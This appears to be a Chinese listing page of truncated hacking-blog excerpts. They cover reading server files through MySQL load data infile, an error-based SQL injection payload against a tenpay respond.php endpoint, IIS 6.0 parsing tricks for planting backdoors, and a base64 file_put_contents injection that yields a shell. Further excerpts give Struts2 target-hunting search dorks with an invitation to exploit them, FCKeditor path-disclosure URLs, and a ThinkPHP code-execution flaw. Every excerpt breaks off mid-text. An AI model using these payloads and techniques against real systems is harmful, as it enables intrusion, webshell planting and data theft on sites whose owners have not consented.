一、mysql3.x下 不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下: mysql>create table a (cmd text); mysql>load data infile 'c:\\boot.ini' into table a; mysql>…
原漏洞分析:http://www.hackline.net/a/news/ldfb/web/2011/0105/7877.html respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7…
一、IIS 6.0 目录解析:/xx.asp/xx.jpg xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码 IIS6.0 会将 xx.jpg 解析为 asp 文件。 后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0 都会把此类后缀文件成功解析为asp 文件。 参考:IIS 文件名解析漏洞扼要分析 {/x…
昨天优酷首页关于360和百度的搜索战的报道中放出了这么一个视频: 从视频的第33秒到43秒,我们可以清晰地听到优酷 记者给周鸿祎拨号的整个过程,的确用人耳听会觉得每个音都差不多(下面会解释原因),但是将 它们转化成图形以后,就可以很清楚地看到它们的差别了。 我们先用ffmpeg将这段声音截出来,转成PCM Signed 24位的单声道wav文件,然后用Adobe Soundbooth打开它: 绿色…
下面简单的揭露下怎么获取webshell后门密码 1、在password登陆框 随便输入一错误密码,提示error,如图: 2、然后右键查看源文件,搜索[password],font 后面跟的就是shell的密码,测试一下 3、按照上面的方法,貌似通杀...
简要描述: 记事狗微博系统,后台存在设计缺陷,可导致进入后台者获得shell 详细说明: 1、系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件 2、在备份文件名中输入 ');file_put_contents(base64_decode('YS5waHA='),base64_decode('PD…
该漏洞主要组合一些关键字比较重要,没有NB的关键字,只有爱想的脑袋,比如: Inurl:index.action Inurl:商城.achtion (商城比较多) Inurl:index.achtion 标题:apache struts2 Inurl:action?id= 选定目标,开始利用吧 Struts2这个漏洞很多大站都存在,比如这个香港电视台的,不过这个执行命令卡 我就换个搞过的吧,那样方…
Windows Server服务器远程登录端口默认为3389,如果要查看确认当前使用的远程登陆端口,可以使用tasklist /svc和netstat /ano两条命令查出来。 打开--->开始--->运行,输入cmd回车进入命令行界面。 输入 tasklist /svc 回车,查看结果,找到服务为TermService行对应的进程PID号: 查到我本机当前远程服务使用的PID为193…
1、查看编辑器版本 /fckeditor/editor/dialog/fck_about.html 2、爆绝对路径 FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php (php通杀) FCKeditor/editor/filemanager/browser/default/bro…
ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架(目前我们公司所有项目都是TP的),ThinkPHP不正确过滤用户提交的参数,远程攻击者可以利用漏洞以应用程序上下文执行任意PHP代码。 通过SVN我们来分析一下官方的补丁: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php 125 - $res = pre…